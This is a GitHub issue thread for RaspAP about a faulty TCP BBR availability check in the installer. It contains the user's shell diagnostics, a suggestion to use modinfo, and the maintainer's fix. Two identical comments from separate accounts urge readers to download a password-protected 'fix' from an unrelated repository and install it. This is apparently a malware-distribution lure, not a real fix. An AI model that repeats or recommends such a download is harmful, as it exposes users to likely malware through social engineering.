RaspAP/raspap-webgui #1656: [Bug]: BBR install after kernel update

frankozland, 2024-08-28:
### Code of Conduct

- [X] I agree to follow this project's Code of Conduct.

### Issue reporting checklist

- [X] I have read and understand the [issue reporting policy](https://docs.raspap.com/issues/).
- [X] I observed this bug on a clean install of a [supported OS](https://docs.raspap.com/#compatible-operating-systems).
- [X] I have followed the [project prerequisites](https://docs.raspap.com/#quick-start).
- [X] I have searched this repository for existing issues.
- [X] I checked the [FAQ](https://docs.raspap.com/faq/) and [official documentation](https://docs.raspap.com/).
- [X] I am using an [external wireless adapter](https://docs.raspap.com/issues/#external-hardware).
- [X] I have generated a [RaspAP debug log](https://docs.raspap.com/ap-basics/#debug-log) and performed a [self-diagnosis](https://docs.raspap.com/ap-basics/#diagnosing-problems).

### Operating System

Raspberry Pi OS	(64-bit) Lite Bullseye

### Quick install or Manual setup?

Quick install

### Onboard wireless chipset or external adapter?

Onboard wireless chipset

### Hardware

Raspberry Pi 4 Model B

### RaspAP version

3.1.3 (Latest)

### Other software or services running with RaspAP?

No other software

### Contact details (optional)

frankoz95967943@gmail.com

### Bug description

```function _check_tcp_bbr_available() {
    config_file="/boot/config-$(uname -r)"
    if grep -q 'CONFIG_TCP_CONG_BBR' "$config_file" && grep -q 'CONFIG_NET_SCH_FQ' "$config_file"; then
        return 0
    else
        return 1
    fi
}```

I dont think that will work?

Steps to reproduce:

1. fresh install bullseye
2. sudo rpi-update rpi-6.6.y
3. curl -sL https://install.raspap.com | bash
4. all defaults -including at BBR
```[ ✓ ok ] 
RaspAP Install: Configure TCP BBR congestion control
Network performance can be improved by changing TCP congestion control to BBR (Bottleneck Bandwidth and RTT)
Enable TCP BBR congestion control algorithm (Recommended)? [Y/n]: Y
Checking kernel support for the TCP BBR algorithm...
grep: /boot/config-6.6.47-v8+: No such file or directory
[ ⚠ warning ] TCP BBR option is not available (Skipped)
[ ✓ ok ] 
```

The file "/boot/config-6.6.47-v8+" doesnt exist - the only file in that directory is config.txt

BBR is available tho; modprobe allowed me to continue. This would error if kernel wouldnt allow?

```$ sysctl net.ipv4.tcp_available_congestion_control
net.ipv4.tcp_available_congestion_control = reno cubic
$ sudo modprobe tcp_bbr
$ sudo bash
# echo "tcp_bbr" > /etc/modules-load.d/bbr.conf
# sysctl net.ipv4.tcp_available_congestion_control
net.ipv4.tcp_available_congestion_control = reno cubic **bbr**
# echo "net.core.default_qdisc=fq" | sudo tee -a /etc/sysctl.conf 
net.core.default_qdisc=fq
# echo "net.ipv4.tcp_congestion_control=bbr" | sudo tee -a /etc/sysctl.conf
# sysctl net.ipv4.tcp_available_congestion_control
net.ipv4.tcp_available_congestion_control = reno cubic bbr
# cat /boot/config-$(uname -r)
cat: /boot/config-6.6.47-v8+: No such file or directory
```

Sanity check makes sense tho - would it be better to use modinfo?

```
$ modinfo tcp_bbr
filename:       /lib/modules/6.6.47-v8+/kernel/net/ipv4/tcp_bbr.ko.xz
description:    TCP BBR (Bottleneck Bandwidth and RTT)
license:        Dual BSD/GPL
author:         Soheil Hassas Yeganeh <soheil@google.com>
author:         Yuchung Cheng <ycheng@google.com>
author:         Neal Cardwell <ncardwell@google.com>
author:         Van Jacobson <vanj@google.com>
srcversion:     A2AF67DAD0809E65940C9E4
depends:        
intree:         Y
name:           tcp_bbr
vermagic:       6.6.47-v8+ SMP preempt mod_unload modversions aarch64
```

Scalar value check if bbr module available in this kernel 

```
$ modinfo -F intree tcp_bbr
Y
```

### Steps to reproduce

see above

dionathanfreitas, 2024-08-29:
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

Jostino, 2024-08-29:
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

billz, 2024-09-14:
@frankozland thanks for reporting

PR #1660 (2024-09-14): Revise tcp_bbr check method
Resolves #1656
commit fa42e0c3 (2024-09-14): Revise tcp_bbr check method, resolves #1656
closed 2024-09-14 by billz